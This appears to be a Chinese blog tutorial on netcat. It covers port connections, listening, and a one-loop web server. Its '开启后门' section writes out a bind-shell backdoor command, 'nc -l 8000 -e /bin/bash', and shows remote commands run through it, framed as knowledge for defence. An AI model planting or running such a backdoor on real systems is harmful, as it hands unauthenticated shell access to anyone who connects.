最近解决问题的时候,都用到了nc,但是之前对这个被称为“瑞士军刀”工具了解不多。这次趁机梳理一下
之前在SSH穿越代理时就用到了nc (ssh&git如何穿越代理)
介绍
shell脚本中经常使用管道来把多个命令串联起来,比如下面:
$ cat /var/log/messages | sort | uniq | less
上面命令显示了过滤、排序、去重后的系统日志信息。不过上面的命令只能在一台机器上运行,但是如果
$ cat /var/log/messages | sort | uniq | laptop
上面的命令并不会执行,因为laptop并不是一个有效的命令。不过在很多场合,我们确实需要执行跨机命令,通过网络通道,确实还是有办法实现的。 实现思路如下:
Web Server
^ |
| v
^ |
| v
echo --> netcat --> less
netcat接收本地标准输入,发给Web Server,并把获取到的回复输出到标准输出
基本命令
nc options host-IP-address port
常用场景
连接到远程服务器端口
使用命令nc 192.168.1.101 80,获取服务器信息,也可以使用GET获取整个页面内容
$ nc 192.168.58.101 80
HEAD / HTTP/1.1
HTTP/1.1 400 Bad Request
Server: nginx/1.14.0
Date: Sat, 29 Dec 2018 13:44:49 GMT
Content-Type: text/html
Content-Length: 173
Connection: close
监听端口
执行命令nc -l 8000,服务器会开始在8000端口监听入站连接。
使用netstat查看网络连接,可以看到8000端口已经被监听。
$ netstat -anp | grep 8000
tcp 0 0 0.0.0.0:8000 0.0.0.0:* LISTEN 40327/nc
tcp6 0 0 :::8000 :::* LISTEN 40327/nc
上面是监听tcp端口,也可以监听udp端口
nc -l -u 8000
$ netstat -anp | grep 8001
udp 0 0 0.0.0.0:8001 0.0.0.0:* 40585/nc
udp6 0 0 :::8001 :::* 40585/nc
开启后门
nc 命令还可以用来在系统中创建后门,并且这种技术也确实被黑客大量使用。 为了保护我们的系统,我们需要知道它是怎么做的。 创建后门的命令为:
$ nc -l 8000 -e /bin/bash
开启之后,其他机器可以连接到端口8000上并执行命令,获取服务器信息
$ nc 192.168.58.101 8000
pwd
/home/tenmao
cd ..
pwd
/home
简易WEB服务器
不借助tomcat/nginx/httpd等WEB容器,仅用nc就可以用快速搭建一个单页面的WEB服务器。
首先建立一个index.html文件:
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>Greeting Page</title>
</head>
<body>
<h1>Hello World!</h1>
</body>
</html>
执行脚本命令:
while true;do { printf '%b\r\n' 'HTTP/1.1 200 OK' '\r\n';cat index.html; }|nc -l 8000;done
用浏览器可以打开连接: http://192.168.58.101:8000或者使用curl命令
$ curl -i http://192.168.58.101:8000
HTTP/1.1 200 OK
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>Hello Page</title>
</head>
<body>
<h1>Hello World!</h1>
</body>
</html>
